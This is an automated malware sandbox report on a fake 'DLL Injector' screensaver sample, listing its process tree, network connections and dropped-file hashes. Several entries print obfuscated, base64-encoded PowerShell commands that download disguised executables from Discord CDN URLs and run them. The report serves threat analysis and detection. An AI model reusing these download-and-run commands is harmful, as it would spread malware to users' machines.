PID 2548 wrote to memory of 1520 N/A C:\Users\Admin\AppData\Local\Temp\ejNKtmaS2q.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2548 wrote to memory of 1520 N/A C:\Users\Admin\AppData\Local\Temp\ejNKtmaS2q.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2960 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\kbfZNSrCxk.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2960 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\kbfZNSrCxk.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2960 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\kbfZNSrCxk.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1212 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 1212 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 1212 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 2168 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\EWMH14lt5V.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2168 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\EWMH14lt5V.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2168 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\EWMH14lt5V.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2880 wrote to memory of 1404 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\eGEy2BBAjc.exe
PID 2880 wrote to memory of 1404 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\eGEy2BBAjc.exe
PID 2880 wrote to memory of 1404 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\eGEy2BBAjc.exe
PID 1212 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 1212 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 1212 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 2328 wrote to memory of 760 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\t6mhfPW6v7.exe
PID 2328 wrote to memory of 760 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\t6mhfPW6v7.exe
PID 2328 wrote to memory of 760 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\t6mhfPW6v7.exe
PID 1404 wrote to memory of 1000 N/A C:\Users\Admin\AppData\Local\Temp\eGEy2BBAjc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1404 wrote to memory of 1000 N/A C:\Users\Admin\AppData\Local\Temp\eGEy2BBAjc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1404 wrote to memory of 1000 N/A C:\Users\Admin\AppData\Local\Temp\eGEy2BBAjc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 268 wrote to memory of 1092 N/A C:\Windows\system32\rundll32.exe C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
PID 268 wrote to memory of 1092 N/A C:\Windows\system32\rundll32.exe C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
PID 268 wrote to memory of 1092 N/A C:\Windows\system32\rundll32.exe C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
PID 268 wrote to memory of 1092 N/A C:\Windows\system32\rundll32.exe C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
PID 1212 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 1212 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 1212 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 2872 wrote to memory of 1624 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\e0voTtq6Ld.exe
PID 2872 wrote to memory of 1624 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\e0voTtq6Ld.exe
PID 2872 wrote to memory of 1624 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\e0voTtq6Ld.exe
PID 1212 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 1212 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 1212 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 760 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\t6mhfPW6v7.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\t6mhfPW6v7.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\t6mhfPW6v7.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr

"C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr" /S

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\5xL2BNRi9u.sln

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\5xL2BNRi9u.sln

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\kbfZNSrCxk.exe

C:\Users\Admin\AppData\Local\Temp\kbfZNSrCxk.exe

C:\Users\Admin\AppData\Local\Temp\kbfZNSrCxk.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\ejNKtmaS2q.exe

C:\Users\Admin\AppData\Local\Temp\ejNKtmaS2q.exe

C:\Users\Admin\AppData\Local\Temp\ejNKtmaS2q.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\EWMH14lt5V.exe

C:\Users\Admin\AppData\Local\Temp\EWMH14lt5V.exe

C:\Users\Admin\AppData\Local\Temp\EWMH14lt5V.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\eGEy2BBAjc.exe

C:\Users\Admin\AppData\Local\Temp\eGEy2BBAjc.exe

C:\Users\Admin\AppData\Local\Temp\eGEy2BBAjc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwB3ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANQA1ADcANgA3ADIAMAA2ADkANwA0ADUAOQA1ADAAOQAzAC8AMQAxADcANgA0ADYAOQA5ADAAMwAyADYAMAAyADcAMAA2ADAAMgAvAFcAaQBuAGwAbwBnAG8AbgAuAGUAeABlACcALAAgADwAIwBqAGUAawAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAawB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGoAYgB2ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADMASABHAEYASgAzADIALgBlAHgAZQAnACkAKQA8ACMAcQB1AG4AIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbABiAHYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGwAYQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADMASABHAEYASgAzADIALgBlAHgAZQAnACkAPAAjAHgAegBlACMAPgA="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYQBwACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAxADUANQA3ADYANwAyADAANgA5ADcANAA1ADkANQAwADkAMwAvADEAMQA3ADYANAA2ADkAOQAyADgAMQA1ADMANAA2ADkAMAAyADgALwBXAGkAbgBkAG8AdwBzAEQAZQBmAGUAbgBkAGUAcgAuAGUAeABlACcALAAgADwAIwB5AHgAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAZwBxACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGcAZwBrACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADEASABGAEoAMwAyAC4AZQB4AGUAJwApACkAPAAjAG4AdQBzACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHcAegBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBtAGQAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxAEgARgBKADMAMgAuAGUAeABlACcAKQA8ACMAagB5AHcAIwA+AA=="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAZQBnACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANQA1ADcANgA3ADIAMAA2ADkANwA0ADUAOQA1ADAAOQAzAC8AMQAxADcANgA0ADYAOQA5ADIANQAxADYAMgA5ADEAMwA4ADIAMgAvAEQAcwBGAHIAQQBLAE4AWABtAFcALgBlAHgAZQAnACwAIAA8ACMAdQBwAHAAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBzAHkAYgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB1AHQAaAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAyAEgARwBGAEoAMwAyAC4AZQB4AGUAJwApACkAPAAjAGMAbAB6ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGwAYQB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAGQAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAyAEgARwBGAEoAMwAyAC4AZQB4AGUAJwApADwAIwBqAHEAYQAjAD4A"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAegBpACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANQA1ADcANgA3ADIAMAA2ADkANwA0ADUAOQA1ADAAOQAzAC8AMQAxADcANgA0ADYAOQA4ADkAMwAzADEAOQA3ADcANAAyADAAOAAvAGoAaABzAGQALgBlAHgAZQAnACwAIAA8ACMAcAB0AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBqAHoAcAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBnAGoAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA0AEgARwBHAEYASgAzADIALgBlAHgAZQAnACkAKQA8ACMAagBqAGgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYQBrAGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHIAZgBjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADQASABHAEcARgBKADMAMgAuAGUAeABlACcAKQA8ACMAeAB3AGoAIwA+AA=="

C:\Users\Admin\AppData\Local\Temp\t6mhfPW6v7.exe

C:\Users\Admin\AppData\Local\Temp\t6mhfPW6v7.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\t6mhfPW6v7.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\e0voTtq6Ld.exe

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\5xL2BNRi9u.sln"

C:\Users\Admin\AppData\Local\Temp\e0voTtq6Ld.exe

C:\Users\Admin\AppData\Local\Temp\e0voTtq6Ld.exe

C:\Users\Admin\AppData\Local\Temp\JV0sMlrH4P.exe

C:\Users\Admin\AppData\Local\Temp\JV0sMlrH4P.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAYwByACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANQA1ADcANgA3ADIAMAA2ADkANwA0ADUAOQA1ADAAOQAzAC8AMQAxADcANgA0ADYAOQA4ADAAMQA0ADEANAAxADYAOAA2ADIANgAvAGUAbABlAGMAaQBpAHAAaQBjAGwALgBlAHgAZQAnACwAIAA8ACMAcQBwAHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBsAGsAbAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGcAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA1AEgAQwBHAEcARgBKADMAMgAuAGUAeABlACcAKQApADwAIwBjAHcAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBmAGMAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcgB1AHEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANQBIAEMARwBHAEYASgAzADIALgBlAHgAZQAnACkAPAAjAHAAYgBqACMAPgA="

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\JV0sMlrH4P.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdwBmACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANQA1ADcANgA3ADIAMAA2ADkANwA0ADUAOQA1ADAAOQAzAC8AMQAxADcANgA0ADcAMwA2ADcAOAA4ADAAOQAxADUANwA2ADUAMgAvAFIAdQBuAHQAaQBtAGUAQgByAG8AawBlAHIALgBlAHgAZQA/AGUAeAA9ADYANQA2AGUAZgBmADcAZQAmAGkAcwA9ADYANQA1AGMAOABhADcAZQAmAGgAbQA9ADQANgBkAGMANQBlAGMAMwA1ADkAZgA4AGEANgA2AGYAMAA4AGUAZQBmAGQANgA0ADIAZgA2AGYANAA0ADIANAA4ADQANAA0ADAAYgBiADIANAA0AGIAYwBhADcANAAwAGUAMAA0ADYAYwAzADMAMwBjADcAOQAyADEAYQA1ADgAJgAnACwAIAA8ACMAYwBqAHAAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBsAHYAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBnAHUAbAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA2AEgAQwBHAEcARgBKADMAMgAuAGUAeABlACcAKQApADwAIwByAHAAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBzAGEAagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBiAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANgBIAEMARwBHAEYASgAzADIALgBlAHgAZQAnACkAPAAjAGIAdwB4ACMAPgA="

Network

Country Destination Domain Proto
US 8.8.8.8:53 textbin.net udp
US 148.72.177.212:443 textbin.net tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 88.221.25.153:80 apps.identrust.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 148.72.177.212:443 textbin.net tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp

Files

memory/1212-0-0x000000013F630000-0x000000013F794000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab6CAA.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

memory/1212-19-0x000000013F630000-0x000000013F794000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TarA76B.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

C:\Users\Admin\AppData\Local\Temp\kbfZNSrCxk.exe

MD5 a75b85a9502a6933aa0a9873ac3a6df0
SHA1 b477e4eb9df62f6e3e80a6e3e54b4d2812c842ed
SHA256 940d2c9ae3f5545cd6ec398089907f79c34e0c4341a23d2d2aaa7716378f3701
SHA512 cdb238f48c60f92dc7896c7f5d6d4ea52499e918740c782092b59fbb96e0a1369ceb63be82c28c45683efae0480a94ee6369bbd10408907b24d15232e053bce7

C:\Users\Admin\AppData\Local\Temp\kbfZNSrCxk.exe

MD5 a75b85a9502a6933aa0a9873ac3a6df0
SHA1 b477e4eb9df62f6e3e80a6e3e54b4d2812c842ed
SHA256 940d2c9ae3f5545cd6ec398089907f79c34e0c4341a23d2d2aaa7716378f3701
SHA512 cdb238f48c60f92dc7896c7f5d6d4ea52499e918740c782092b59fbb96e0a1369ceb63be82c28c45683efae0480a94ee6369bbd10408907b24d15232e053bce7

C:\Users\Admin\AppData\Local\Temp\ejNKtmaS2q.exe

MD5 a25afcfcab5014e3b1c1d00be2ed1c98
SHA1 33b01c0c85791e70deab178c307b976856a53f17
SHA256 18c04e1e7011010cc0cf983dda84804c03bb1de35adff177614f6a4d537f5e6d
SHA512 2a90d06ffd8b9dc086ab5000ba988a66b532ef0918e7e4b24fda564af5b1a1c4ff4bf2243f2bea986ae81272a8868401996aafcc3576e624e721e0d34466410e

C:\Users\Admin\AppData\Local\Temp\ejNKtmaS2q.exe

MD5 a25afcfcab5014e3b1c1d00be2ed1c98
SHA1 33b01c0c85791e70deab178c307b976856a53f17
SHA256 18c04e1e7011010cc0cf983dda84804c03bb1de35adff177614f6a4d537f5e6d
SHA512 2a90d06ffd8b9dc086ab5000ba988a66b532ef0918e7e4b24fda564af5b1a1c4ff4bf2243f2bea986ae81272a8868401996aafcc3576e624e721e0d34466410e

memory/2548-104-0x0000000000E60000-0x0000000000E68000-memory.dmp

memory/2960-102-0x0000000000810000-0x0000000000818000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\EWMH14lt5V.exe

MD5 3ed2b4079de8367146d73a4eabbb527b
SHA1 59ae6a2c2c6fa1aa8c7bffc04e6123c5b301c038
SHA256 cf7251cce700eca1370e65fb29f0e5e960a44ac77347ffcaa7daab45f693a8be
SHA512 f7a6e86c1a33e212c932a0a7f3f2674018ed8a48ccd24380ee2a199a0c9133971577d6c7cc93e1ea8294bc68657bbcb8342b8f103dc201a3d37602a8882d5a8d

memory/2168-109-0x0000000000160000-0x0000000000168000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\EWMH14lt5V.exe

MD5 3ed2b4079de8367146d73a4eabbb527b
SHA1 59ae6a2c2c6fa1aa8c7bffc04e6123c5b301c038
SHA256 cf7251cce700eca1370e65fb29f0e5e960a44ac77347ffcaa7daab45f693a8be
SHA512 f7a6e86c1a33e212c932a0a7f3f2674018ed8a48ccd24380ee2a199a0c9133971577d6c7cc93e1ea8294bc68657bbcb8342b8f103dc201a3d37602a8882d5a8d

memory/2548-112-0x000007FEF5C80000-0x000007FEF666C000-memory.dmp

memory/2168-111-0x000007FEF5C80000-0x000007FEF666C000-memory.dmp

memory/2960-117-0x000007FEF5C80000-0x000007FEF666C000-memory.dmp

memory/1404-116-0x0000000000210000-0x0000000000218000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eGEy2BBAjc.exe

MD5 0e2c37cc209fd52cce861928d859ab2d
SHA1 773ce4304e33a6cd74432572472244d8bf8e2d14
SHA256 081d8540af456e8725aa2de3bf1d18dcfad5aceb0a86c7fc5b8c847b1a78f051
SHA512 9ca95e3d40f6c95d0cf8c372aa68c49b276dd6731865c02e657e7e25e871e78b6f52e857b4f507acdc575942f9cb7c449586afab0dc3285ea6d727ae5c250b2e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X3Y1WBLG1ZAKPMXON2TL.temp

MD5 864ccc625db2d100fdd3a52db92d0448
SHA1 78ddaa3474fd443aa9e38d2832d4b03824574c7b
SHA256 5e0015f89dff17d7860c3bc9228538dc9e68a366eb9c7c1456971e98b9667546
SHA512 f0a6bbdca610206c7ceac4414515c75c25a54314e0a279de74d69480b3546dd4edcf04a4c83830b736a8795cb9d5e02b8758dca5aad7c7d5ede4c475bbc0eb26

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 864ccc625db2d100fdd3a52db92d0448
SHA1 78ddaa3474fd443aa9e38d2832d4b03824574c7b
SHA256 5e0015f89dff17d7860c3bc9228538dc9e68a366eb9c7c1456971e98b9667546
SHA512 f0a6bbdca610206c7ceac4414515c75c25a54314e0a279de74d69480b3546dd4edcf04a4c83830b736a8795cb9d5e02b8758dca5aad7c7d5ede4c475bbc0eb26

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 864ccc625db2d100fdd3a52db92d0448
SHA1 78ddaa3474fd443aa9e38d2832d4b03824574c7b
SHA256 5e0015f89dff17d7860c3bc9228538dc9e68a366eb9c7c1456971e98b9667546
SHA512 f0a6bbdca610206c7ceac4414515c75c25a54314e0a279de74d69480b3546dd4edcf04a4c83830b736a8795cb9d5e02b8758dca5aad7c7d5ede4c475bbc0eb26

C:\Users\Admin\AppData\Local\Temp\eGEy2BBAjc.exe

MD5 0e2c37cc209fd52cce861928d859ab2d
SHA1 773ce4304e33a6cd74432572472244d8bf8e2d14
SHA256 081d8540af456e8725aa2de3bf1d18dcfad5aceb0a86c7fc5b8c847b1a78f051
SHA512 9ca95e3d40f6c95d0cf8c372aa68c49b276dd6731865c02e657e7e25e871e78b6f52e857b4f507acdc575942f9cb7c449586afab0dc3285ea6d727ae5c250b2e

C:\Users\Admin\AppData\Local\Temp\t6mhfPW6v7.exe

MD5 142a3cc69d15044024d4ccd3282e20f6
SHA1 a2ebe1b4cddc1012ba96c8e4dc0905d95501f69b
SHA256 dccd94fcb5cd38b6077af35e7e85aaa867f263a9d00910197388e11e71c6b5e3
SHA512 9da05e395f0636b90d1c9132d485ca75bbb1a2bccfe46b1ae0c1bab6e5101928a2b548786e66aebde27e5b005ccdf0c48592b87659f7688a1976a70c1982ca6f

memory/1404-137-0x000007FEF5C80000-0x000007FEF666C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\t6mhfPW6v7.exe

MD5 142a3cc69d15044024d4ccd3282e20f6
SHA1 a2ebe1b4cddc1012ba96c8e4dc0905d95501f69b
SHA256 dccd94fcb5cd38b6077af35e7e85aaa867f263a9d00910197388e11e71c6b5e3
